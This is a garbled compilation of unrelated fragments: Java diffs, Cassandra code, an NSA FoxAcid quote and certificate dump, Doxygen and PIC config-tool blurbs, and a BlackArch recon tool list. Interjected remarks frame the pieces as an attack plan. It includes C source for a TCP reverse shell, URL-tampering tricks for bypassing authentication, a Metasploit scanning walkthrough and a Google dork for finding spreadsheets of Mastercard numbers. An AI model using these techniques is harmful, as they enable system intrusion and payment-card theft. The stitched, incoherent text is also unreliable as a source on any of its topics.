this is the tunneling as far as I understand

if (!sync && replicationQueue != null && !usingBuddyReplication)
{
if (log.isDebugEnabled()) log.debug("Putting call " + call + " on the replication queue.");
- replicationQueue.add(commandsFactory.buildReplicateCommand(call));
+// replicationQueue.add(commandsFactory.buildReplicateCommand(call));
}
else
{


and this tricking the "sort of resize byte" for the email to go trought..if you care on understanding me...

a serialized byte[][] array where element 0 is the
- * transient state (or null) , and element 1 is the
- * persistent state (or null)
- * @param targetRoot node into which the state should be integrated
- */
- protected void setState(ObjectInputStream state, NodeSPI targetRoot) throws Exception
- {
- long startTime = System.currentTimeMillis();
- /*
- * Vladimir/Manik/Brian (Dec 7,2006)
- *
- * integrator.integrateState(in,targetRoot, cl) will call cache.put for each
- * node read from stream. Having option override below allows nodes read
- * to be directly stored into a tree since we bypass interceptor chain.
- *
 - */
- if (log.isDebugEnabled())
- log.debug("starting state integration at node " + targetRoot + ". Fetch Persistent State = " + fetchPersistentState);
- integrator.integrateState(state, targetRoot.getDelegationTarget(), targetRoot.getFqn(), fetchPersistentState);
-
- if (log.isDebugEnabled())
- log.debug("successfully integrated state in " + (System.currentTimeMillis() - startTime) + " msec");
- }
-}

How to exclude a computer from SonicWALL Content Filtering Service/ to Allow Specific Email Addresses to Bypass Detection and Prevention by DPI Services

Java Code Examples for org.apache.cassandra.streaming.OperationType

 

 

/**
    * Not multi-threaded intentionally.
    * @return 
    */
   public Collection<PendingFile> stream(File directory) throws IOException, InterruptedException
   {
       Client client = new Client()
       {
           public boolean validateColumnFamily(String keyspace, String cfName)
           {
               return true;
           }

           public void init(String keyspace)
           {
           }
       };
       try {
    client.setPartitioner(config.getPartitioner());
} catch (Exception e) {
    logger.error("Configuration Exception while setting partitioner", e);
}
       
       
       SSTableLoader loader = new SSTableLoader(directory, client, options);       
       
       Collection<PendingFile> pendingFiles = Lists.newArrayList();
       for (SSTableReader sstable : loader.openSSTables())
       {
           Descriptor desc = sstable.descriptor;
           List<Pair<Long, Long>> sections = Lists.newArrayList(Pair.create(0L, sstable.onDiskLength()));
           PendingFile pending = new PendingFile(sstable, desc, SSTable.COMPONENT_DATA, sections, OperationType.BULK_LOAD);
           StreamHeader header = new StreamHeader(directory.getName(), UUID.randomUUID(), pending, Collections.singleton(pending));
           logger.info("Streaming to {}", InetAddress.getLocalHost());
           new FileStreamTask(header, InetAddress.getLocalHost()).run();
           logger.info("Done Streaming: " + pending.toString());
           sstable.releaseReference();
           pendingFiles.add(pending);
       }
       return pendingFiles;
   }

http://www.programcreek.com/java-api-examples/index.php?api=org.apache.cassandra.streaming.OperationType

A simple example of this is when a simple parameter is appended to the end of a URL.
For example, imagine a system that uses a parameter "auth" to signify if a user has been authenticated, and prompts for the log in procedure if auth=0, switching it to auth=1 once a successful login has taken place. As long as auth=1, the user remains authenticated and able to access restricted pages.
Trying to get to a restricted page, a user's browser might submit: http://www.mycorporatewebapp.com/remotemanagement.asp?auth=0
Bypassing this authentication might then be as simple as changing auth=0 to auth=1.
he question that hackers ask is whether there are alternative URLs, which are not on the "restricted list", which point to the same restricted pages? or example, imagine a restricted
Web page: http://mycorporatedevice/admin/configuration/
What if a hacker were to append an extra "/" at the end of this URL:
http://mycorporatedevice/admin/configuration//
or add some other character like "?" or "%" or "~"? In some cases these URLs are effectively equivalent, even though they look different. If the authentication mechanism only checks for the original URL but not the variations then it can easily be bypassed.

 

http://www.w4rri0r.com/attacker-surface/bypass-authentication.html 

"After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user's computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems. Once the computer is
successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information"

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5

emsm-gh1-uea10.nsa.gov

C=US

O=U.S. Government

OU=DoDPKINSA/CSS

CN=emsm-gh1-uea10.nsa.gov

Fingerprints: d9fcc417c2

Issuer:

DOD ID SW CA-37

Serial:

12177

Not valid before:

2016-04-12 14:40­:26 UTC

Not valid after:

2019-04-13 14:40­:26 UTC

Key size:

2048

Signature Algorithm:

sha256WithRSAEnc­ryption

authorityKeyIdentifier:

keyid:16:24:7E:F­7:2D:C1:EF:92:3F­:BE:44:E7:54:5E:­E9:FE:17:BA:F3:A­1

subjectKeyIdentifier:

53:D9:A5:2D:B9:A­C:82:A0:F3:12:59­:BE:C5:5B:A9:63:­D6:81:83:25

authorityInfoAccess:

CA Issuers - URI­:http://crl.disa­.mil/sign/DODIDS­WCA_37.cer­OCSP - URI:http:­//ocsp.disa.mil

keyUsage:

Digital Signatur­e, Key Encipherm­ent

crlDistributionPoints:

Full Name:­ URI:http://crl­.disa.mil/crl/DO­DIDSWCA_37.crl

subjectAltName:

DNS:emsm-gh1-uea­10.nsa.gov

certificatePolicies:

Policy: 2.16.840­.1.101.2.1.11.39

extendedKeyUsage:

TLS Web Server A­uthentication, T­LS Web Client Au­thentication, 1.­3.6.1.5.5.8.2.2

Certificates

Fingerprint		Issuer	Serial	Public Key	Download	Tools
d9fc­c417­c29a­037d­ac90­aea5­f178­e91d­59ec­9862		DOD ID SW CA-37	1217­7	d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

shell_reverse_tcp.c

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

#include #include #include #include #include #include #include   int main(void) {     int sockfd;         // file descriptor for socket     int lportno = 12345;    // listener port     struct sockaddr_in serv_addr; // {2,str[14]}     char *const params[] = {"/bin/sh",NULL};     char *const environ[] = {NULL};       sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);     serv_addr.sin_family = AF_INET; // 2     serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost     serv_addr.sin_port = htons(lportno);  // little endian     connect(sockfd, (struct sockaddr *) &serv_addr, 16);     // redirect stdout and stderr     dup2(sockfd,0); // stdin     dup2(0,1); // stdout     dup2(0,2); // stderr     execve("/bin/sh",params,environ); }

http://www.arti-sec.com/article/create-shellcode-tcp-reverse-shell-slae      YOU NEED TO KNOW WHERE TO GO:     endpoint_mapper The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information. msf > use auxiliary/scanner/dcerpc/endpoint_mapper msf auxiliary(endpoint_mapper) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 135 yes The target port THREADS 1 yes The number of concurrent threads In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work. https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/

Server signature , how to get it ?

Server signature is now available for everyone, i'll just show with pictures where to get it and how to use it.
Thats pretty simple.

Go to serverlist , choose the server you are interested in , check bottom infos to get the signature code.
(click on the picture to see fullsize)



Once you clicked on server signature you should get this :



Copy the code & insert it to your signature for example , using the " Insert Image" function

Which gives :



Tips : select your image(double click on it) then add a link example : http://et.trackbase.net/server/41109/
So if you click on your signature , you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool

Doxygen

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:

1. It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in ) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
2. You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
3. You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).

Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/ 

Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/ 

TODAY WE ARE SETTING A GAME...

ConfigGenerator

The ConfigGen utility can be used as an aid in setting the device configuration fuse settings.

• ConfigGen_v11.zip - Config Generator software.

Unzip the utility and place the file ConfigGen.exe in a directory of your choice. The software uses the MPASM '8bit_device.info' file as the source of its information, and can be set to use the MPASM, MPASMX, or Swordfish copy.

Config Generator Software

Make sure the software is pointing to the MPASM, MPASMX, or Swordfish Bin installation folder. If it is not, use the 'Change Folder...' button to point to the location of the file '8bit_device.info'. For MPLAB this is typically "C:\Program Files\Microchip\MPASM Suite" and for MPLABX it's "C:\Program Files\Microchip\MPLABX\mpasmx". Next, press the 'Load File' button. This will open the .info file and build a list of all PIC18 devices contained in it. Select your desired device from the 'Device' dropdown list and it will display all of the config fuses and their default settings.

Clicking the 'Setting' column for a config entry will show a dropdown list with all of the valid selections for that fuse.

When all config settings have been made, click the 'Generate' button and the program will generate source code with all of your selections (the 'Comments' checkbox will remove the descriptions and just leave the settings, if desired).

Selecting 'Copy to Clipboard' will dump the output window contents into the Windows clipboard, which you can then paste into a file using a text editor or the Swordfish IDE using 'Edit | Paste' (or Ctrl-V).

The 'Set Defaults' button will change all the settings back to the defaults provided in the .info file, with the exception of 'XINST', 'DEBUG', 'LVP', and 'IOL1WAY' (if present for the selected device). The program always sets these off.

BlackArch Linux Complete Tools List

BlackArch Linux Complete Tools List

https://www.blackarch.org/tools.html 

 

Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages.

Tool count: 23

BlackArch recon

Name	Version	Description	Homepage
api-dnsdumpster	29.f8cce1f	Unofficial Python API for http://dnsdumpster.com/.
basedomainname	0.1	Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names.
bing-ip2hosts	0.4	Enumerates all hostnames which Bing has indexed for a specific IP address.
catnthecanary	7.e9184fe	An application to query the canary.pw data set for leaked data.
cutycapt	10	A Qt and WebKit based command-line utility that captures WebKit's rendering of a web page.
dnsbrute	2.b1dc84a	Multi-theaded DNS bruteforcing, average speed 80 lookups/second with 40 threads.
dnsenum	1.2.4.2	Script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
dnsrecon	0.8.9	Python script for enumeration of hosts, subdomains and emails from a given domain using google.
dnsspider	0.8	A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation.
dnstracer	1.9	Determines where a given DNS server gets its information from, and follows the chain of DNS servers
dnswalk	2.0.2	A DNS debugger
domain-analyzer	0.8.1	Finds all the security information for a given domain name.
dradis	3.0.0.rc1	An open source framework to enable effective information sharing.
enum4linux	0.8.9	A tool for enumerating information from Windows and Samba systems.
facebot	23.57f6025	A facebook profile and reconnaissance system.
fbid	11.b8106f8	Show info about the author by facebook photo url.
flashlight	107.39594b5	Automated Information Gathering Tool for Penetration Testers.
geoedge	0.2	This little tools is designed to get geolocalization information of a host, it get the information from two sources (maxmind and geoiptool).
githack	6.b83a744	A `.git` folder disclosure exploit.
gitminer	29.e25f339	Tool for advanced mining for content on Github.
goodork	2.2	A python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line.
goofile	1.5	Command line filetype search
goog-mail	1.0	Enumerate domain emails from google.
gwtenum	7.f27a5aa	Enumeration of GWT-RCP method calls.
halcyon	0.1	A repository crawler that runs checksums for static files found within a given git repository.
hasere	1.0	Discover the vhosts using google and bing.
idswakeup	1.0	A collection of tools that allows to test network intrusion detection systems.
intrace	1.5	Traceroute-like application piggybacking on existing TCP connections
ircsnapshot	94.cb02a85	Tool to gather information from IRC servers.
ivre	1027.1b9acae	Network recon framework.
kacak	1.0	Tools for penetration testers that can enumerate which users logged on windows system.
lanmap2	127.1197999	Passive network mapping tool.
lbd	20130719	Load Balancing detector
ldapenum	0.1	Enumerate domain controllers using LDAP.
lft	3.76	A layer four traceroute implementing numerous other features.
linux-exploit-suggester	32.9db2f5a	A Perl script that tries to suggest exploits based OS version number.
loot	51.656fb85	Sensitive information extraction tool.
machinae	61.67b9725	A tool for collecting intelligence from public sites/feeds about various security-related pieces of data.
mdns-recon	7.cf67423	An mDNS recon tool written in Python.
metagoofil	1.4b	An information gathering tool designed for extracting metadata of public documents
missidentify	1.0	A program to find Win32 applications.
monocle	1.0	A local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network.
nasnum	5.df5df19	Script to enumerate network attached storages.
necromant	3.acbc448	Python Script that search unused Virtual Hosts in Web Servers.
neglected	8.68d02b3	Facebook CDN Photo Resolver.
netdiscover	0.3	An active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks.
netmask	2.4.3	Helps determine network masks
nipper	0.11.7	Network Infrastructure Parser
nsec3walker	20101223	Enumerates domain names using DNSSEC
ntp-ip-enum	0.1	Script to pull addresses from a NTP server using the monlist command. Can also output Maltego resultset.
osinterator	3.8447f58	Open Source Toolkit for Open Source Intelligence Gathering.
parsero	81.e5b585a	A robots.txt audit tool.
quickrecon	0.3.2	A python script for simple information gathering. It attempts to find subdomain names, perform zone transfers and gathers emails from Google and Bing.
recon-ng	4.8.1	A full-featured Web Reconnaissance framework written in Python.
revipd	5.2aaacfb	A simple reverse IP domain scanner.
ripdc	0.2	A script which maps domains related to an given ip address or domainname.
sctpscan	34.4d44706	A network scanner for discovery and security.
shard	1.5	A command line tool to detect shared passwords.
simplyemail	505.159429f	Email recon made fast and easy, with a framework to build on http://CyberSyndicates.com.
sipi	10.10f087f	Simple IP Information Tools for Reputation Data Analysis.
smbcrunch	5.23ea4cc	3 tools that work together to simplify reconaissance of Windows File Shares.
smtp-user-enum	1.2	Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO.
sn1per	116.58c25c7	Automated Pentest Recon Scanner.
spfmap	8.a42d15a	A program to map out SPF and DKIM records for a large number of domains.
spiderfoot	2.7.0	The Open Source Footprinting Tool.
spoofcheck	16.8cce591	Simple script that checks a domain for email protections.
ssl-hostname-resolver	1	CN (Common Name) grabber on X.509 Certificates over HTTPS.
subdomainer	1.2	A tool designed for obtaining subdomain names from public sources.
sysdig	0.11.0	Open source system-level exploration and troubleshooting tool
theharvester	53.0f9a670	Python tool for gathering e-mail accounts and subdomain names from different public sources (search engines, pgp key servers).
tilt	90.2bc2ef2	An easy and simple tool implemented in Python for ip reconnaissance, with reverse ip lookup.
tinfoleak	3.6469eb3	Get detailed information about a Twitter user activity.
traceroute	2.1.0	Tracks the route taken by packets over an IP network
treasure	6.a91d52b	Hunt for sensitive information through githubs code search.
twofi	2.0	Twitter Words of Interest.
vbrute	1.11dda8b	Virtual hosts brute forcer.
waldo	28.a33de7a	A lightweight and multithreaded directory and subdomain bruteforcer implemented in Python.
websearch	1.cce2384	Search vhost names given a host range. Powered by Bing..
whatweb	4188.f467aa2	Next generation web scanner that identifies what websites are running.
windows-exploit-suggester	26.493f96a	This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target.
zgrab	631.bb14ac8	Grab banners (optionally over TLS).